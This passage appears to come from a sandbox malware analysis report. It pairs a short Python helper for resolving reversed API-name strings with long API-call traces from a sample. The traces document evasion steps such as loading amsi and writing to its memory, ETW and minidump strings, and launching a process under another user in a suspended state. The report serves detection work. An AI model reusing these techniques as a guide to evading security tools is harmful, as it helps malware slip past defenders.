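        return "prefix-stripped", hits
    return "none", []


def resolve(string_id: str) -> list[dict]:
    """Resolve every non-module token of a String ID to candidate APIs."""
    module, tokens = parse_string_id(string_id)
    exports = EXPORTS_BY_MODULE.get(module or "", set())
    results = []
    for tok in tokens:
        kind, names = candidates(tok, exports)
        results.append({"module": module, "raw": tok, "reversed": tok[::-1],
                        "match": kind, "apis": names})
    return results


if __name__ == "__main__":
    # The two String ID values shown in the report for this sample.
    for sid in ("ntdll$yromeMlautriVetacollAwZ", "Ntdll$yromeMlautriVetirW"):
        for r in resolve(sid):
            print(f"{r['module']}: {r['raw']!r} -> {r['reversed']} "
                  f"[{r['match']}] {', '.join(r['apis']) or '-'}")
```

Run against the two String IDs from the report, the first resolves exactly to ZwAllocateVirtualMemory and the second to NtWriteVirtualMemory or ZwWriteVirtualMemory via the prefix-stripped match; a hunting rule can then key on the reversed forms themselves, which are stable across builds that keep this obfuscation.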
                                        APIs
                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 02B4DA6C
                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DABE), ref: 02B4DA82
                                        • NtDeleteFile.NTDLL(?), ref: 02B4DAA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: DeleteFileInitStringUnicode
                                        • String ID:
                                        • API String ID: 3559453722-0
                                        • Opcode ID: fb8581d54e7116504da0e3fcaad5b686ae378fbad62be45eff5aa9a6e6d2ebda
                                        • Instruction ID: 48d2413674974c7bd17cddf0a9429b3a5dd471437b307ee56c0d8791c77430a1
                                        • Opcode Fuzzy Hash: fb8581d54e7116504da0e3fcaad5b686ae378fbad62be45eff5aa9a6e6d2ebda
                                        • Instruction Fuzzy Hash: 40016D75A08349BEEB06EBA08D81BDD77B9AB45704F5004E3A360F7092DF74AF049B25
                                        APIs
                                          • Part of subcall function 02B34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B34EDA
                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 02B4DA6C
                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DABE), ref: 02B4DA82
                                        • NtDeleteFile.NTDLL(?), ref: 02B4DAA1
                                          • Part of subcall function 02B34C0C: SysFreeString.OLEAUT32(02B4E950), ref: 02B34C1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: String$AllocDeleteFileFreeInitUnicode
                                        • String ID:
                                        • API String ID: 2841551397-0
                                        • Opcode ID: d5aa3bd631e148c2adcc021865b2ad426b577172a6248e9e47262827f943ebda
                                        • Instruction ID: 0f938ea95f31f660c3faca2cec450ebf3adecd383723ca7fd74753b60f6d578c
                                        • Opcode Fuzzy Hash: d5aa3bd631e148c2adcc021865b2ad426b577172a6248e9e47262827f943ebda
                                        • Instruction Fuzzy Hash: 8401E17190420DAADB11EAE0CD91FDEB3BDEB48700F5045A2A610E6190EB74AB049A64
                                        APIs
                                          • Part of subcall function 02B46CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02B46D41,?,?,?,00000000), ref: 02B46D21
                                        • CoCreateInstance.OLE32(?,00000000,00000005,02B46E34,00000000,00000000,02B46DB3,?,00000000,02B46E23), ref: 02B46D9F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CreateFromInstanceProg
                                        • String ID:
                                        • API String ID: 2151042543-0
                                        • Opcode ID: 9234c8deb258968928f8d10349f248c0980d757c0ecc1a562262412a5bb46f09
                                        • Instruction ID: a242f5d83437b4e853bb54c35b39c88ccdd64b4756a1b55128c7918912a0d8c2
                                        • Opcode Fuzzy Hash: 9234c8deb258968928f8d10349f248c0980d757c0ecc1a562262412a5bb46f09
                                        • Instruction Fuzzy Hash: 9201F731648704AEE705DFA4DC9296B7BEDE74EB10B5144B5F901D2650EE308A10E961
                                        APIs
                                          • Part of subcall function 02B4A95C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B4ABE3,?,?,02B4AC75,00000000,02B4AD51), ref: 02B4A970
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B4A988
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B4A99A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B4A9AC
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B4A9BE
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B4A9D0
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B4A9E2
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B4A9F4
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B4AA06
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B4AA18
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B4AA2A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B4AA3C
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B4AA4E
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B4AA60
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B4AA72
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B4AA84
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B4AA96
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02B4AC75,00000000,02B4AD51), ref: 02B4ABE9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 2242398760-0
                                        • Opcode ID: 3fc796fe7e3dec8c4b69b0cdb6f057c8f1388b9f6ef7e8ea3a74802b1cdd6402
                                        • Instruction ID: d6391237a1d6c2b2f1c89b5ad8b704e975529567e139ddbb9fe3f28cc6640941
                                        • Opcode Fuzzy Hash: 3fc796fe7e3dec8c4b69b0cdb6f057c8f1388b9f6ef7e8ea3a74802b1cdd6402
                                        • Instruction Fuzzy Hash: 05C08CA36522311B8A106AF82DD88C3478DCF4A1F630988E2F609D3102DB258C10B2B0

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 02B48824: LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
                                          • Part of subcall function 02B48824: FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C857DC,02C85820,OpenSession,02B9137C,02B5AFD8,UacScan,02B9137C), ref: 02B57E39
                                        • ResumeThread.KERNEL32(00000000,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,UacScan,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8), ref: 02B58483
                                        • CloseHandle.KERNEL32(00000000,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,UacScan,02B9137C,02B5AFD8,00000000,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C), ref: 02B58602
                                          • Part of subcall function 02B487A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,UacScan), ref: 02B487B4
                                          • Part of subcall function 02B487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B487CE
                                          • Part of subcall function 02B487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize), ref: 02B4880A
                                        • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B9137C,02B5AFD8,UacInitialize,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,UacScan,02B9137C), ref: 02B589F4
                                          • Part of subcall function 02B37E18: GetFileAttributesA.KERNEL32(00000000,?,02B4F8CC,ScanString,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,UacScan,02B9137C,02B5AFD8,UacInitialize), ref: 02B37E23
                                          • Part of subcall function 02B4DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DB9E), ref: 02B4DB0B
                                          • Part of subcall function 02B4DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B4DB45
                                          • Part of subcall function 02B4DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B4DB72
                                          • Part of subcall function 02B4DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B4DB7B
                                          • Part of subcall function 02B4818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B48216), ref: 02B481F8
                                        • ExitProcess.KERNEL32(00000000,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,Initialize,02B9137C,02B5AFD8,00000000,00000000,00000000,ScanString,02B9137C,02B5AFD8), ref: 02B5AA25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                        • API String ID: 1548959583-1225450241
                                        • Opcode ID: c98bd8f3fcbddab39530cc8e05dab42046ffec65bd06b86d075a4c65d39ddf07
                                        • Instruction ID: 69db2bb1f34aa02231497eb6c3dd375420343870eb729634c284c33a12196f48
                                        • Opcode Fuzzy Hash: c98bd8f3fcbddab39530cc8e05dab42046ffec65bd06b86d075a4c65d39ddf07
                                        • Instruction Fuzzy Hash: 77431CB6A501688FDB16EB64DD80ADE73B6FF88300F1045E6E509EB254DA30EE85CF51

                                        Control-flow Graph

                                        APIs
                                        • Sleep.KERNEL32(00000000,?,02B32000), ref: 02B317D0
                                        • Sleep.KERNEL32(0000000A,00000000,?,02B32000), ref: 02B317E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 249fb98fb7141ddc012c85284082e7c2480c0228c53b860c1461fb51bbe0f35e
                                        • Instruction ID: 4a15fe2087937dd63cc40c78f75d4fc812e8be0f4b58a7c3419ef8c1b0586442
                                        • Opcode Fuzzy Hash: 249fb98fb7141ddc012c85284082e7c2480c0228c53b860c1461fb51bbe0f35e
                                        • Instruction Fuzzy Hash: A5B15576A203418BEB16CF2CD880355BBE9FB85364F0886EEE55E8B385C770E451CB90

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryW.KERNEL32(amsi), ref: 02B48715
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                          • Part of subcall function 02B47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B48774
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                        • String ID: DllGetClassObject$W$amsi
                                        • API String ID: 941070894-2671292670
                                        • Opcode ID: 0ac4e86d76097c5376c62ff273848e35a854f8fd3358ce432a17273745a894cd
                                        • Instruction ID: 047837b1fb477bda28bdbcf2b363dbbc7d5968b86ab84bc2ee0fd23571a4496e
                                        • Opcode Fuzzy Hash: 0ac4e86d76097c5376c62ff273848e35a854f8fd3358ce432a17273745a894cd
                                        • Instruction Fuzzy Hash: FAF0A46110C38179E201E6748C85F4FBFCD4B52224F048A9DF1E8562D2DA75D104ABB7

                                        Control-flow Graph

                                        APIs
                                        • Sleep.KERNEL32(00000000,?,?,00000000,02B31FE4), ref: 02B31B17
                                        • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B31FE4), ref: 02B31B31
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 54c1fbc5757ae58e29e506e5d3460af84105410bcc35fac673cb4331f7cc1d17
                                        • Instruction ID: 98a80c09975176e242ccbc08925cafd6c45ff120486a5e1b4f02964fceef1bfe
                                        • Opcode Fuzzy Hash: 54c1fbc5757ae58e29e506e5d3460af84105410bcc35fac673cb4331f7cc1d17
                                        • Instruction Fuzzy Hash: 2751AE756212408FEB16CF6CC9847A6BBD8EF45324F1885EEE54DCB282E770D845CBA1

                                        Control-flow Graph

                                        APIs
                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B4E436
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CheckConnectionInternet
                                        • String ID: Initialize$OpenSession$ScanBuffer
                                        • API String ID: 3847983778-3852638603
                                        • Opcode ID: eac469f51af5eb1fb6cf3f56115eb1897e807f397025970f8ecd5bff98624696
                                        • Instruction ID: 8459008793e9ced45e4c333ca2b7233c233fce72e9d5b05da8946fb690ca4644
                                        • Opcode Fuzzy Hash: eac469f51af5eb1fb6cf3f56115eb1897e807f397025970f8ecd5bff98624696
                                        • Instruction Fuzzy Hash: C8410E71B501089FEB12EBA4DC81A9EB3FAFF8C320F6148A5E141A7250DE74ED059F60
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • WinExec.KERNEL32(?,?), ref: 02B48478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$Exec
                                        • String ID: Kernel32$WinExec
                                        • API String ID: 2292790416-3609268280
                                        • Opcode ID: 4dffc9f80140bdeb2d71b54b1feeaddd79cd6e488d9d16091eb3f23cb7789310
                                        • Instruction ID: 353d0769635558fba0cbf3808e67a766105e7e4a2a7413dfdcdbc64af108d1bb
                                        • Opcode Fuzzy Hash: 4dffc9f80140bdeb2d71b54b1feeaddd79cd6e488d9d16091eb3f23cb7789310
                                        • Instruction Fuzzy Hash: 4C018C35A54204BFEB11EFB8DC82B5A77FDE748750F9184A1F504E7A50DA74AD00AA24
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • WinExec.KERNEL32(?,?), ref: 02B48478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$Exec
                                        • String ID: Kernel32$WinExec
                                        • API String ID: 2292790416-3609268280
                                        • Opcode ID: 2a841243de9c19cf54a01c7fbf363dc054f1fd9dbb99fc61ba20e42a5d26acc3
                                        • Instruction ID: 3c09a39f9ac6cf051482cdfea22cbc83af0d669d8e31071062271029039cb7e8
                                        • Opcode Fuzzy Hash: 2a841243de9c19cf54a01c7fbf363dc054f1fd9dbb99fc61ba20e42a5d26acc3
                                        • Instruction Fuzzy Hash: 6BF08C35A54204BFEB11EFB8DC82B5A77BDE748750F9184A1F504E7A50DA74A900AA24
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B45CFC,?,?,02B43888,00000001), ref: 02B45C10
                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B45CFC,?,?,02B43888,00000001), ref: 02B45C3E
                                          • Part of subcall function 02B37D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B43888,02B45C7E,00000000,02B45CFC,?,?,02B43888), ref: 02B37D66
                                          • Part of subcall function 02B37F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B43888,02B45C99,00000000,02B45CFC,?,?,02B43888,00000001), ref: 02B37F3F
                                        • GetLastError.KERNEL32(00000000,02B45CFC,?,?,02B43888,00000001), ref: 02B45CA3
                                          • Part of subcall function 02B3A700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B3C361,00000000,02B3C3BB), ref: 02B3A71F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                        • String ID:
                                        • API String ID: 503785936-0
                                        • Opcode ID: e39027f5c567a172c52bd4e3c962e275022b61c5c489c2d4a0b62e0ab61aa927
                                        • Instruction ID: 421a72dc749f1c95695a10ae64b5cfc250b75cd48ce5d89ec7b19a624a2ac9d7
                                        • Opcode Fuzzy Hash: e39027f5c567a172c52bd4e3c962e275022b61c5c489c2d4a0b62e0ab61aa927
                                        • Instruction Fuzzy Hash: 41318375E006089FEB11EFA4C881B9EBBF6AF48314F9084A5E904E7381DB755A05CFA1
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,00000000,02C85914), ref: 02B4E704
                                        • RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02B4E76F), ref: 02B4E73C
                                        • RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02B4E76F), ref: 02B4E747
